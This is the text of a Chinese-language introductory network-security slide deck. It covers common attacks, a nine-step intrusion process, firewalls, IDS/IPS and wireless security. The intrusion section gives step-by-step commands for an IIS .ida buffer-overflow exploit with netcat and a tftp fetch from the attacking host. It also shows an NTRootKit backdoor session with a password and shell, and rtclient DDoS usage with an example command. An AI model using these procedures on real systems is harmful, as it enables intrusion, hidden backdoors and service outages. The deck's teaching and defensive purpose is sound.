網路安全概論

網路安全概論

Agenda 內容大綱 • 資訊安全概論 • 防火牆 & IDS,IPS • 基本網路障礙排除 • 無線網路安全 • Q&A

資訊安全概論 • 常見的攻擊行為 • 病毒與蠕蟲(Worm)攻擊 • 後門程式與特洛伊木馬 • IP Spoofing(IP偽造) • DOS,DDOS(阻斷攻擊) • 駭客入侵流程分析 • 駭客入侵九大步驟 • 入侵防治

常見攻擊行為(1) • Virus & Worm 攻擊 • CodeRed,Nimda, SQL Slammer • Blaster • Backdoor & Trojan • 惡意網頁popup程式 • 病毒郵件 • peep.exe & peepbrowser.exe • win.ini、system.ini、系統服務、registry

常見攻擊行為(2) • IP spoofing–IP假造攻擊 • mendas • ipspoof • hunt • DOS & DDOS 拒絕服務攻擊 • SYN Flood

DDOS攻擊示意圖

駭客入侵流程分析 • 資料蒐集 • 目標掃描 • 弱點刺探 • 取得初步權限 • 提昇權限 • 進行破壞 • 建立後門 • 隱藏蹤跡、消滅證據 • 癱瘓目標

1.資料蒐集:找出可供入侵的資源 • 網頁拜訪 • Whois • InterNIC • TWNIC(http://www.twnic.net/) • NetworkSolutions • 社交工程 • DNS zone transfer • nslookup • traceroute or tracert

2.目標掃描 Tools • Ping • Nmap • SuperScan • Advanced ip scanner • Advanced port scanner • Icmpenum • NetScan Tool Pro 2000 • Netcat • Strobe

3.弱點刺探 • 網路資源與分享 • Net view, nbtstat, nbtscan, nltest, Legion,… • 使用者與群組探查 • nbtscan • nbtstat, enum • 遠端登入程式 • telnet,vnc,terminal service,pcanywhere

收集資訊目的 • 偵測目的網路的所有主機 • 偵測目的所提供服務 • 判斷目的主機服務種類(banner grabbing) • 判斷目的主機之作業系統 (OS guessing) • DNS區域資料 • Windows 網域之NetBIOS名稱及DC • Windows相關資料，如user、group、網卡數量、通訊協定。

4.進行滲透：取得初步權限 • 密碼猜測 • 不安全的密碼 • NTIS(空白密碼) • administrator, adm , test…. • 字典攻擊法 • SMBCrack • Legion, NetBIOS Audition Tool,… • 網路監聽 • cain • 緩衝區溢位(Buffer Overflow)攻擊 • IIS

緩衝區溢位(Buffer Overflow)攻擊 • IIS ida溢出漏洞的攻擊 • 工具：tftpd32, idahack, nc, whoami • 步驟： • Start tftpd32 • 進入命令提示字元模式，並切換至idahack所在目錄 • 輸入 “ idahack 欲攻擊目標IP 欲攻擊目標之IIS port 欲攻擊目標OS version代碼欲開啟之連接port • Nc 欲攻擊目標IP 由idahack所開啟之port • Ipconfig /all /* 確認攻擊成功 */ • Cd \ • Tftp –I 發動攻擊HOST 之IP get whoami.exe • Whoami /* 確認目前的使用者帳號 */

5. 提昇權限 • 密碼猜測 • 網路監聽 • 密碼檔破解工具 • Tools: pwdump2, L0phtCrack, John • 將使用者加入管理者群組 • getadmin, Sechole • 鍵盤敲擊記錄 • Keylogger • To find Protected Storage Service • including passwords for e-mail accounts in Microsoft Outlook, Microsoft Outlook Express, MSN Messenger, saved Internet Explorer form data . • Protected Storage Explorer • Protected storage passview

6.進行破壞 • 竊取破壞 • 置換網頁 • 刪除資料 • 跳板攻擊 • 攻擊知名企業或政府單位

7.建立後門 • 啟動的操控 • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion, \Run, \RunOnce, \RunOnceEx, \RunServices • 遠端控制 • Telnet service • VNC,Terminal services,pcanywhere

8.隱藏蹤跡、消滅證據 • 關閉稽核 • 清除記錄 • Elsave, ClearLogs, ClearIIsLog • 隱藏檔案 • Attrib • 隱藏至NTFS file streaming：sfind • Win2k支援，WinXP,Win2003不支援 • LNS： List NTFS Streams • 使用rootkit

使用rootkit • Tool:NTRootKit • 可隱藏自身及所開的port，工作管理員，netstat –an 看不到。 • 可進行DDOS攻擊

NTRootKit 攻擊演示 • Victim:202.132.10.1 • Attracker:131.107.100.10 • 在被攻擊端電腦(Victim)執行ntrootkit • 在攻擊端電腦執行 nc 202.132.10.1 445 • !!!PASSWORD yyt_hac111 • 出現訊息：Welcome to yyt_hac's ntrootkit Server 1.22 version,use '?' command to get command list • CMD>? • CMD>getsysinfo • CMD>hidetcpport 135 :隱藏 TCP port 135 • CMD>hideudpport 135 :隱藏 UDP port 135 • CMD>openshell • C:\>dir • C:\>exit • CMD>exit • 出現訊息： exit successfully

攻擊結果check • Netstat –an • 使用fport或Active port • 看TCP、UDP 135是否開啟 • 使用工作管理員或Taskinfo • 看是否顯示ntrootkit程式 • 查看服務清單，是否顯示相關程式服務啟動

使用ntrootkit進行DDOS攻擊 • usage:rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type] [-d icmp_code] [-m MTU] [-c Command] • destip-------------The computer you want to connect • password-----------The ntrootkit's password • proto--------------The proto that ntrootkit will use(0:userdefined,1:icmp,2:udp,3:tcp) • port---------------The dest udp or tcp port which send packet to(default is 445 • MTU----------------The MAX packet size the ntrootkit will use to send packet • icmp_type----------The icmp packet type which send to server,default is ICMP_ECHO REPLY • icmp_code----------The icmp packet code which send to server,default is 0 • Command------------The command which you want the server to do • The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount] • DDos_Destip--------The computer you want to DDos • DDos_Destport------The Destport you want to DDos(default is 445) • DDos_type----------The DDos type you want to use(0:ping flood,1:udp flood,2:synflood,3:mstream flood,default is 0) • DDos_seconds-------The seconds you want to DDos the dest(default is 150s) • DDos_ProcCount-----The process count which the server use to ddos(default is 10) • Example: • rtclient 202.132.10.1 -p yyt_hac -t 1 -c ddos 202.132.10.1 139 2 300 20

9.癱瘓目標 • 阻斷服務 • SYN Flood • IP Spoofing • DDOS • 郵件炸彈 • Tools • Ping of death、land、teardrop、mailbomb、spam mail

入侵防治 • 制定安全政策 • 定期系統更新 • 安全網路通訊協定 • 定期檢查與稽核 • 安全設備防衛 • 基本快速發現及移除惡意程式方法 • 預防勝於治療 - 談如何防範入侵

制定安全政策 • 使用者帳號密碼原則 • 密碼長度 • 有意義字集 • 資料備份 • 異地備援 • 機房保全設施 • 監視設備

定期系統更新 • 系統與程式最小安裝與設定 • 關閉未使用的網路服務 • iptables • 安裝安全修正程式 • Windows update • apt-yum • up2date

安全網路通訊協定 • 資料加密(Data Encryption) • DES,3DES,RSA • 認證(Authentication) • .htaccess • CGI程式 • 稽核(Auditing) • EX. TCPWRAPPER,SSH,SSL,KERBEROS, PEM (Privacy Enhanced Mail) ,VPN

安全設備防衛 • 安裝安全防護程式 • 防毒/掃毒程式 • 防火牆 • 入侵偵測系統-IDS • 入侵防禦系統-IPS

定期檢查與稽核 • syslog • 病毒掃描 • port scan • 木馬/後門程式掃描 • Ad-Aware SE Personal • 具有後門程式掃描及個人隱私記錄反追蹤移除：可幫助使用者定期掃瞄自己電腦中是否有惡意程式、告程式的存在，並且讓使用者可以輕鬆移除一些記錄使用者瀏覽網頁動作的 cookie • 系統網路設備弱點掃描

基本快速發現及移除惡意程式方法 • 開啟cmd.exe，輸入利用「netstat -an -p tcp」指令清查異常對外通訊的應用程式。 • 檢查登錄編輯器（Registry）：清查HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run等自動啟動路徑。 • 檢核微軟系統目錄中（路徑大多為C:\WINNT\SYSTEM32\）是否存在下列異常檔案。 • 重新開機並注意電腦對外通訊情形。

Why防火牆 • 什麼是防火牆 • 為什麼需要防火牆 • 防火牆如何管制

Firewall 種類 • 封包過濾防火牆－Packet filtering Firewall • 效能好 • 易建置 • Cost 低 • 代理伺服器防火牆－Proxy Firewall • 狀態檢驗式防火牆－Stateful Inspection Firewall

Firewall 種類 • 封包過濾防火牆－Packet filtering Firewall • 代理伺服器防火牆－Proxy Firewall • 成本高 • 效能差 • 最安全 • 狀態檢驗式防火牆－Stateful Inspection Firewall

Firewall 種類 • 封包過濾防火牆－Packet filtering Firewall • 代理伺服器防火牆－Proxy Firewall • 狀態檢驗式防火牆－Stateful Inspection Firewall • 效能較好 • 有最大的擴展及延伸能力 • 安全性高 • 為現行防火牆主流

防火牆架構 • Routing-路由模式 • NAT-來源位址轉換模式 • 節省IP Address • 隱藏 Private IP • Transparent-透通模式 • 簡易 • 網路架構變動最少

防火牆設定程序 • 前置階段 • 評估單位安全需求 • 擬定安全策略 • 購買經費? • 建置階段 • 完成階段

防火牆設定程序 • 前置階段 • 建置階段 • 公司Server IP 及開放服務列表 • Server Location • 決定架構 • 完成階段

防火牆設定程序 • 前置階段 • 建置階段 • 完成階段 • 驗證policy • 製作操作手冊

Security Policy • 安全政策的調校 • 組織單位網路環境完整熟析 • Policy愈簡潔愈好 • Policy Loading Match優先順序

防火牆進階應用 • Radius,Kerberos等認證 • 虛擬私人網路（VPN） • 叢集負載平衡等功能 • 防範入侵和蠕蟲攻擊

選購Firewall須注意事項 • 符合企業組織需求 ? • 安全性 ? • 建置成本 ? • 管理功能 ? • 執行效率及效能 ? • 擴充性 ? • 事件紀錄和警告 ? • 附加其他的事件報告軟體 ?

防火牆的限制 • 易成架構上之瓶頸 • 無法管制內部使用者破壞行為 • 無法有效阻止開後門的行為 • 無法有效阻止針對作業系統漏洞進行的入侵行為 • 防火牆不提供資料完整性驗證的功能

入侵偵測系統的基本組成 • 監控方法-資訊來源 • 主機型（host-based, HIDS） • 網路型（network-based, NIDS） • 分析架構 • 反應機制

入侵偵測系統的基本組成 • 監控方法（資訊來源） • 分析架構 • Signature-Base Detection • Protocol-Anomaly Detection • 反應機制

入侵偵測系統的基本組成 • 監控方法（資訊來源） • 分析架構 • 反應機制 • Action • report

IDS & IPS • 高度可信正常流量--允許通過 • 高度可信攻擊流量--阻擋 • 不明流量--紀錄或警示(入侵偵測) • 入侵防護不能阻擾日常營運

基本網路障礙排除 • 找出問題pc或主機 • 網路設備log • Firewall log auditin • 網路拔線測試 • Sniffer,netxray,…網路監聽軟體 • 判斷問題原因&排除 • worm,virus,….etc. • Network looping

無線網路安全 • 無線網路安全機制 • 使用者認證(Authentication) • 資料保密(Confidentiality) • 資料完整確認(Interity) • 第三者介入 • 通訊劫奪

無線網路安全 • 無加密認證-SSID • 開放系統認證 • 封閉系統認證 • 加密認證 • WEP(wired equivalent privacy) • 對稱式加密系統

增進無線網路安全的方法 • 修改預設的設定 • 預設密碼 • Snmp string • 預設SSID • 預設的通訊頻道 • 修改網路設定 • 網路卡號管理 • 防火牆區隔網段 • 802.1X使用者認證

網路嵌入式伺服晶片簡介 • 更方便管理 • 圖形管理介面 • 更加安全 • SSL,SSH • 多元化服務 • MAIL,DNS,WWW,FTP,NAT,MYSQL, • Openwebmail,Samba,proxy…etc

網路安全概論